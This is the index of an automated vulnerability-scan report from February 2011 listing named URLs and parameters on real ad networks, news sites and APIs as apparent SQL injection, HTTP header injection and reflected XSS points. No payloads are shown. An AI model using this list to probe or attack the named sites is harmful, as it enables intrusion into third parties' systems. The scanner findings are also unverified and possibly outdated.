DORK, Report, XSS, 2-14-2011, SQL Injection, HTTP Header Injection

CAPEC-66: SQL Injection, CAPEC-86: Embedding Script (XSS) in HTTP Headers

Report generated by CloudScan Vulnerability Crawler at Mon Feb 14 09:58:08 CST 2011.

1. SQL injection

1.1. http://ad.yieldmanager.com/imp [r parameter]

1.2. http://ads.asp.net/a.aspx [%24CC cookie]

1.3. http://ads.asp.net/a.aspx [%24RC cookie]

1.4. http://c5.zedo.com//ads2/k/889025/4381/172/0/305004506/305004506//0/305/916//1000003/i.js [REST URL parameter 11]

1.5. http://googleads.g.doubleclick.net/pagead/ads [Referer HTTP header]

1.6. http://googleads.g.doubleclick.net/pagead/ads [bih parameter]

1.7. http://googleads.g.doubleclick.net/pagead/ads [ga_fc parameter]

1.8. http://googleads.g.doubleclick.net/pagead/ads [lmt parameter]

1.9. http://googleads.g.doubleclick.net/pagead/ads [num_ads parameter]

1.10. http://googleads.g.doubleclick.net/pagead/ads [oe parameter]

1.11. http://googleads.g.doubleclick.net/pagead/ads [region parameter]

1.12. http://googleads.g.doubleclick.net/pagead/ads [u_w parameter]

1.13. http://pandora.cnet.com/api/rest/ddaImageHandler/index.php [fieldNum parameter]

1.14. http://sitelife.desmoinesregister.com/ver1.0/SiteLifeProxy [name of an arbitrarily supplied request parameter]

1.15. http://tap.rubiconproject.com/oz/sensor [put_1197 cookie]

1.16. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [Referer HTTP header]

1.17. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [User-Agent HTTP header]

1.18. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]

1.19. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]

1.20. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]

1.21. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]

1.22. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]

1.23. http://www.desmoinesregister.com/odygel/lib/core/core.js [REST URL parameter 3]

1.24. http://www.desmoinesregister.com/scripts/app/js/jquery-1.3.1.min.js [REST URL parameter 2]

1.25. http://www.quantcast.com/global/personalHeader [qcVisitor cookie]

1.26. http://www.webbyawards.com/webbys/current_honorees.php [media_id parameter]

2. HTTP header injection

2.1. http://ad.doubleclick.net/activity [REST URL parameter 1]

2.2. http://ad.doubleclick.net/ad/N2724.UndertoneNetwork/B4504763.26 [REST URL parameter 1]

2.3. http://ad.doubleclick.net/ad/N3867.ContextWeb/B5127624.18 [REST URL parameter 1]

2.4. http://ad.doubleclick.net/ad/N6457.4298.ADVERTISING.COM/B4840137.15 [REST URL parameter 1]

2.5. http://ad.doubleclick.net/ad/cm.dailymail/ron_052010 [REST URL parameter 1]

2.6. http://ad.doubleclick.net/adi/N1558.Media6/B3897970.7 [REST URL parameter 1]

2.7. http://ad.doubleclick.net/adi/N2724.Specific_Media/B4323655.35 [REST URL parameter 1]

2.8. http://ad.doubleclick.net/adi/N3285.usatoday/B2343920.27 [REST URL parameter 1]

2.9. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [REST URL parameter 1]

2.10. http://ad.doubleclick.net/adi/N4270.Media6Degrees.com/B5094437.9 [REST URL parameter 1]

2.11. http://ad.doubleclick.net/adi/N4270.Tribal_Fusion/B5094437.2 [REST URL parameter 1]

2.12. http://ad.doubleclick.net/adi/N4319.msn/B2087123.383 [REST URL parameter 1]

2.13. http://ad.doubleclick.net/adi/N5367.3630.247REALMEDIAINC.1/B4475978.2 [REST URL parameter 1]

2.14. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_intelligentinvestor [REST URL parameter 1]

2.15. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [REST URL parameter 1]

2.16. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.11 [REST URL parameter 1]

2.17. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.16 [REST URL parameter 1]

2.18. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.2 [REST URL parameter 1]

2.19. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.38 [REST URL parameter 1]

2.20. http://ad.doubleclick.net/adj/N4233.RSI/B4932906.5 [REST URL parameter 1]

2.21. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [REST URL parameter 1]

2.22. http://ad.doubleclick.net/adj/N5506.aol1/B5070033.19 [REST URL parameter 1]

2.23. http://ad.doubleclick.net/adj/N5506.aol1/B5070033.20 [REST URL parameter 1]

2.24. http://ad.doubleclick.net/adj/N5506.aol1/B5070033.21 [REST URL parameter 1]

2.25. http://ad.doubleclick.net/adj/N5798.133090.8212946998421/B3792881.193 [REST URL parameter 1]

2.26. http://ad.doubleclick.net/adj/N6046.134363.2043285697521/B5118749.2 [REST URL parameter 1]

2.27. http://ad.doubleclick.net/adj/N6092.AOL/B5108587.3 [REST URL parameter 1]

2.28. http://ad.doubleclick.net/adj/cm.drudgerep/ [REST URL parameter 1]

2.29. http://ad.doubleclick.net/adj/drudgereport.ilm/remnant [REST URL parameter 1]

2.30. http://ad.doubleclick.net/adj/pmv.inm.ind/news_home [REST URL parameter 1]

2.31. http://ad.doubleclick.net/adj/resn.173878/ [REST URL parameter 1]

2.32. http://ad.doubleclick.net/adj/uk.reuters/news/lifestyle/article [REST URL parameter 1]

2.33. http://ad.doubleclick.net/adj/wpni.politics [REST URL parameter 1]

2.34. http://ad.doubleclick.net/adj/wpni.politics/inlinead [REST URL parameter 1]

2.35. http://amch.questionmarket.com/adscgen/sta.php [code parameter]

2.36. http://amch.questionmarket.com/adscgen/sta.php [name of an arbitrarily supplied request parameter]

2.37. http://bidder.mathtag.com/notify [exch parameter]

2.38. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

2.39. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

2.40. http://c7.zedo.com/utils/ecSet.js [v parameter]

2.41. http://d.adroll.com/pixel/DBLH4FNWEJG3HHKBYW3CFN/LJ7DC3I6ENDUDJRX7PVZRX [REST URL parameter 2]

2.42. http://d.adroll.com/pixel/DBLH4FNWEJG3HHKBYW3CFN/LJ7DC3I6ENDUDJRX7PVZRX [REST URL parameter 3]

2.43. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

2.44. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]

2.45. http://dw.com.com/clear/c.gif [REST URL parameter 2]

2.46. http://live.activeconversion.com/webtracker/track2.html [avc parameter]

2.47. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

2.48. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

2.49. http://w55c.net/m.gif [rurl parameter]

3. Cross-site scripting (reflected)

3.1. http://a.collective-media.net/ad/cm.dailymail/ron_052010 [REST URL parameter 1]

3.2. http://a.collective-media.net/ad/cm.drudgerep/ [REST URL parameter 1]

3.3. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [REST URL parameter 2]

3.4. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [REST URL parameter 3]

3.5. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [name of an arbitrarily supplied request parameter]

3.6. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [sz parameter]

3.7. http://a.collective-media.net/adj/cm.drudgerep/ [REST URL parameter 2]

3.8. http://a.collective-media.net/adj/cm.drudgerep/ [name of an arbitrarily supplied request parameter]

3.9. http://a.collective-media.net/adj/cm.drudgerep/ [sz parameter]

3.10. http://a.rfihub.com/sed [pa parameter]

3.11. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [name of an arbitrarily supplied request parameter]

3.12. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [sz parameter]

3.13. http://ad.doubleclick.net/adi/N4270.Media6Degrees.com/B5094437.9 [name of an arbitrarily supplied request parameter]

3.14. http://ad.doubleclick.net/adi/N4270.Media6Degrees.com/B5094437.9 [sz parameter]

3.15. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382 [name of an arbitrarily supplied request parameter]

3.16. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382 [sz parameter]

3.17. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [adurl parameter]

3.18. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [ai parameter]

3.19. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [client parameter]

3.20. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [num parameter]

3.21. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [sig parameter]

3.22. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [sz parameter]

3.23. http://ad.doubleclick.net/adi/interactive.wsj.com/articletools_sponsor [!category parameter]

3.24. http://ad.doubleclick.net/adi/interactive.wsj.com/articletools_sponsor [name of an arbitrarily supplied request parameter]

3.25. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_intelligentinvestor [!category parameter]

3.26. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_intelligentinvestor [name of an arbitrarily supplied request parameter]

3.27. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [!category parameter]

3.28. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [name of an arbitrarily supplied request parameter]

3.29. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [u parameter]

3.30. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [c parameter]

3.31. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [c parameter]

3.32. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [forced_click parameter]

3.33. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [forced_click parameter]

3.34. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [m parameter]

3.35. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [m parameter]

3.36. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [mid parameter]

3.37. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [mid parameter]

3.38. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sid parameter]

3.39. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sid parameter]

3.40. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sz parameter]

3.41. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sz parameter]

3.42. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [tp parameter]

3.43. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [tp parameter]

3.44. http://ad.doubleclick.net/adj/uk.reuters/news/lifestyle/article [type parameter]

3.45. http://ad.doubleclick.net/adj/wpni.politics/inlinead [ad parameter]

3.46. http://ad.media6degrees.com/adserv/cs [name of an arbitrarily supplied request parameter]

3.47. http://ad.media6degrees.com/adserv/cs [tId parameter]

3.48. http://ad.turn.com/server/pixel.htm [fpid parameter]

3.49. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

3.50. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

3.51. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

3.52. http://ads.adxpose.com/ads/ads.js [uid parameter]

3.53. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

3.54. http://ads.specificmedia.com/serve/v=5 [m parameter]

3.55. http://ads.specificmedia.com/serve/v=5 [name of an arbitrarily supplied request parameter]

3.56. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [AdId parameter]

3.57. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [AdId parameter]

3.58. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [REST URL parameter 1]

3.59. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [name of an arbitrarily supplied request parameter]

3.60. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [name of an arbitrarily supplied request parameter]

3.61. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 1]

3.62. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 2]

3.63. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 3]

3.64. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 4]

3.65. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 5]

3.66. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 6]

3.67. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 7]

3.68. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [cookie parameter]

3.69. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [name of an arbitrarily supplied request parameter]

3.70. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]

3.71. http://ak.quantcast.com/css/ie6.css [REST URL parameter 1]

3.72. http://ak.quantcast.com/css/ie6.css [REST URL parameter 1]

3.73. http://ak.quantcast.com/css/ie6.css [REST URL parameter 2]

3.74. http://ak.quantcast.com/css/ie7.css [REST URL parameter 1]

3.75. http://ak.quantcast.com/css/ie7.css [REST URL parameter 1]

3.76. http://ak.quantcast.com/css/ie7.css [REST URL parameter 2]

3.77. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 1]

3.78. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 1]

3.79. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 2]

3.80. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 2]

3.81. http://ak.quantcast.com/js/concat.js [REST URL parameter 1]

3.82. http://ak.quantcast.com/js/concat.js [REST URL parameter 1]

3.83. http://ak.quantcast.com/js/concat.js [REST URL parameter 2]

3.84. http://ak.quantcast.com/wp-content/themes/quantcast/css/not_ie.min.css [REST URL parameter 1]

3.85. http://ak.quantcast.com/wp-content/themes/quantcast/css/print.min.css [REST URL parameter 1]

3.86. http://ak.quantcast.com/wp-content/themes/quantcast/css/style.min.css [REST URL parameter 1]

3.87. http://ak.quantcast.com/wp-content/themes/quantcast/js/jquery.jstree.js [REST URL parameter 1]

3.88. http://ak.quantcast.com/wp-content/themes/quantcast/js/minified.js [REST URL parameter 1]

3.89. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-4 [mpt parameter]

3.90. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-4 [mpvc parameter]

3.91. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-4 [name of an arbitrarily supplied request parameter]

3.92. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-6 [mpt parameter]

3.93. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-6 [mpvc parameter]

3.94. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-6 [name of an arbitrarily supplied request parameter]

3.95. http://api.bizographics.com/v1/profile.json [&callback parameter]

3.96. http://api.bizographics.com/v1/profile.json [api_key parameter]

3.97. http://api.dimestore.com/viapi [id parameter]

3.98. http://api.echoenabled.com/v1/search [q parameter]

3.99. http://api.facebook.com/restserver.php [method parameter]

3.100. http://api.facebook.com/restserver.php [method parameter]

3.101. http://api.facebook.com/restserver.php [query parameter]

3.102. http://api.facebook.com/restserver.php [urls parameter]

3.103. http://api.js-kit.com/v1/count [q parameter]

3.104. http://ar.voicefive.com/b/rc.pli [func parameter]

3.105. http://b.scorecardresearch.com/beacon.js [c1 parameter]

3.106. http://b.scorecardresearch.com/beacon.js [c10 parameter]

3.107. http://b.scorecardresearch.com/beacon.js [c15 parameter]

3.108. http://b.scorecardresearch.com/beacon.js [c2 parameter]

3.109. http://b.scorecardresearch.com/beacon.js [c3 parameter]

3.110. http://b.scorecardresearch.com/beacon.js [c4 parameter]

3.111. http://b.scorecardresearch.com/beacon.js [c5 parameter]

3.112. http://b.scorecardresearch.com/beacon.js [c6 parameter]

3.113. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 2]

3.114. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 3]

3.115. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 4]

3.116. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 5]

3.117. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 6]

3.118. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 7]

3.119. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 2]

3.120. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 3]

3.121. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 4]

3.122. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 5]

3.123. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 6]

3.124. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 7]

3.125. http://bid.openx.net/json [c parameter]

3.126. http://blogs.desmoinesregister.com/dmr/ [REST URL parameter 1]

3.127. http://blogs.desmoinesregister.com/dmr/ [REST URL parameter 1]

3.128. http://blogs.desmoinesregister.com/dmr/ [name of an arbitrarily supplied request parameter]

3.129. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 1]

3.130. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 1]

3.131. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 2]

3.132. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 2]

3.133. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [name of an arbitrarily supplied request parameter]

3.134. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/audio-player/assets/audio-player.js [REST URL parameter 6]

3.135. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/audio-player/assets/audio-player.js [REST URL parameter 6]

3.136. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js [REST URL parameter 5]

3.137. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js [REST URL parameter 5]

3.138. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css [REST URL parameter 6]

3.139. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css [REST URL parameter 6]

3.140. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 6]

3.141. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 6]

3.142. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 6]

3.143. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 6]

3.144. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/wp-email/email-css.css [REST URL parameter 5]

3.145. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/wp-email/email-css.css [REST URL parameter 5]

3.146. http://blogs.desmoinesregister.com/odygel/lib/3rdparty/gigya/gigya.js [REST URL parameter 5]

3.147. http://blogs.desmoinesregister.com/odygel/lib/3rdparty/gigya/gigya.js [REST URL parameter 5]

3.148. http://blogs.desmoinesregister.com/odygel/lib/analytics/analytics.js [REST URL parameter 4]

3.149. http://blogs.desmoinesregister.com/odygel/lib/analytics/analytics.js [REST URL parameter 4]

3.150. http://blogs.desmoinesregister.com/odygel/lib/anim/yuianimator.js [REST URL parameter 4]

3.151. http://blogs.desmoinesregister.com/odygel/lib/anim/yuianimator.js [REST URL parameter 4]

3.152. http://blogs.desmoinesregister.com/odygel/lib/cookie/cookie.js [REST URL parameter 4]

3.153. http://blogs.desmoinesregister.com/odygel/lib/cookie/cookie.js [REST URL parameter 4]

3.154. http://blogs.desmoinesregister.com/odygel/lib/core/core.js [REST URL parameter 4]

3.155. http://blogs.desmoinesregister.com/odygel/lib/core/core.js [REST URL parameter 4]

3.156. http://blogs.desmoinesregister.com/odygel/lib/dateutil/dateutil.js [REST URL parameter 4]

3.157. http://blogs.desmoinesregister.com/odygel/lib/dateutil/dateutil.js [REST URL parameter 4]

3.158. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN//UI.js [REST URL parameter 5]

3.159. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN//UI.js [REST URL parameter 5]

3.160. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/GDNpostload.js [REST URL parameter 5]

3.161. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/GDNpostload.js [REST URL parameter 5]

3.162. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/GDNpreload.js [REST URL parameter 5]

3.163. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/GDNpreload.js [REST URL parameter 5]

3.164. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js [REST URL parameter 6]

3.165. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js [REST URL parameter 6]

3.166. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/UREvents/ZagUser.js [REST URL parameter 6]

3.167. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/UREvents/ZagUser.js [REST URL parameter 6]

3.168. http://blogs.desmoinesregister.com/odygel/lib/remoting/remoting.js [REST URL parameter 4]

3.169. http://blogs.desmoinesregister.com/odygel/lib/remoting/remoting.js [REST URL parameter 4]

3.170. http://blogs.desmoinesregister.com/odygel/lib/selector/selector.js [REST URL parameter 4]

3.171. http://blogs.desmoinesregister.com/odygel/lib/selector/selector.js [REST URL parameter 4]

3.172. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/login.html [REST URL parameter 5]

3.173. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/login.html [REST URL parameter 5]

3.174. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/signup.html [REST URL parameter 5]

3.175. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/signup.html [REST URL parameter 5]

3.176. http://blogs.desmoinesregister.com/odygel/lib/userauth/userauth.js [REST URL parameter 4]

3.177. http://blogs.desmoinesregister.com/odygel/lib/userauth/userauth.js [REST URL parameter 4]

3.178. http://blogs.desmoinesregister.com/odygel/lib/userauth/validateform.js [REST URL parameter 4]

3.179. http://blogs.desmoinesregister.com/odygel/lib/userauth/validateform.js [REST URL parameter 4]

3.180. http://blogs.desmoinesregister.com/odygel/lib/widgets/banner/banner.js [REST URL parameter 5]

3.181. http://blogs.desmoinesregister.com/odygel/lib/widgets/banner/banner.js [REST URL parameter 5]

3.182. http://blogs.desmoinesregister.com/odygel/lib/widgets/modal/modal.js [REST URL parameter 5]

3.183. http://blogs.desmoinesregister.com/odygel/lib/widgets/modal/modal.js [REST URL parameter 5]

3.184. http://blogs.desmoinesregister.com/odygel/lib/widgets/navigation/navController.js [REST URL parameter 5]

3.185. http://blogs.desmoinesregister.com/odygel/lib/widgets/navigation/navController.js [REST URL parameter 5]

3.186. http://blogs.desmoinesregister.com/odygel/lib/widgets/tabs/geltabs.js [REST URL parameter 5]

3.187. http://blogs.desmoinesregister.com/odygel/lib/widgets/tabs/geltabs.js [REST URL parameter 5]

3.188. http://blogs.desmoinesregister.com/odygel/lib/widgets/time/time.js [REST URL parameter 5]

3.189. http://blogs.desmoinesregister.com/odygel/lib/widgets/time/time.js [REST URL parameter 5]

3.190. http://blogs.desmoinesregister.com/odygel/lib/widgets/widget.js [REST URL parameter 4]

3.191. http://blogs.desmoinesregister.com/odygel/lib/widgets/widget.js [REST URL parameter 4]

3.192. http://blogs.desmoinesregister.com/odygel/lib/widgets/zagmodal/zagmodal.js [REST URL parameter 5]

3.193. http://blogs.desmoinesregister.com/odygel/lib/widgets/zagmodal/zagmodal.js [REST URL parameter 5]

3.194. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

3.195. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

3.196. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [l parameter]

3.197. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

3.198. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

3.199. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [adRotationId parameter]

3.200. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [bannerCreativeAdModuleId parameter]

3.201. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [campaignId parameter]

3.202. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [campaignId parameter]

3.203. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [siteId parameter]

3.204. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [siteId parameter]

3.205. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [syndicationOutletId parameter]

3.206. http://cache.vindicosuite.com/xumo/libs/vindicosuite/xumoJS/prod/vindicosuite.xumo.js.asp [coad parameter]

3.207. http://creativeby2.unicast.com/dynamic.js [pid parameter]

3.208. http://creativeby2.unicast.com/dynamic.js [vnam parameter]

3.209. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

3.210. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

3.211. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

3.212. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

3.213. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [name of an arbitrarily supplied request parameter]

3.214. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

3.215. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

3.216. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

3.217. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

3.218. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]

3.219. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]

3.220. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [name of an arbitrarily supplied request parameter]

3.221. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [q parameter]

3.222. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [q parameter]

3.223. http://dev.inskinmedia.com/trackports/rep/base/track.php [callback parameter]

3.224. http://dev.inskinmedia.com/trackports/rep/base/track.php [type parameter]

3.225. http://dm.de.mookie1.com/2/B3DM/2010DM/11355486136@x23 [REST URL parameter 2]

3.226. http://dm.de.mookie1.com/2/B3DM/2010DM/11355486136@x23 [REST URL parameter 3]

3.227. http://dm.de.mookie1.com/2/B3DM/2010DM/11355486136@x23 [REST URL parameter 4]

3.228. http://dm.de.mookie1.com/2/B3DM/2010DM/11473307965@x23 [REST URL parameter 2]

3.229. http://dm.de.mookie1.com/2/B3DM/2010DM/11473307965@x23 [REST URL parameter 3]

3.230. http://dm.de.mookie1.com/2/B3DM/2010DM/11473307965@x23 [REST URL parameter 4]

3.231. http://dm.de.mookie1.com/2/B3DM/2010DM/11781759243@x23 [REST URL parameter 2]

3.232. http://dm.de.mookie1.com/2/B3DM/2010DM/11781759243@x23 [REST URL parameter 3]

3.233. http://dm.de.mookie1.com/2/B3DM/2010DM/11781759243@x23 [REST URL parameter 4]

3.234. http://ebay.adnxs.com/ttj [pt1 parameter]

3.235. http://ebay.adnxs.com/ttj [pt2 parameter]

3.236. http://ebay.adnxs.com/ttj [pt3 parameter]

3.237. http://ev.ib-ibi.com/pibiview.js [xid parameter]

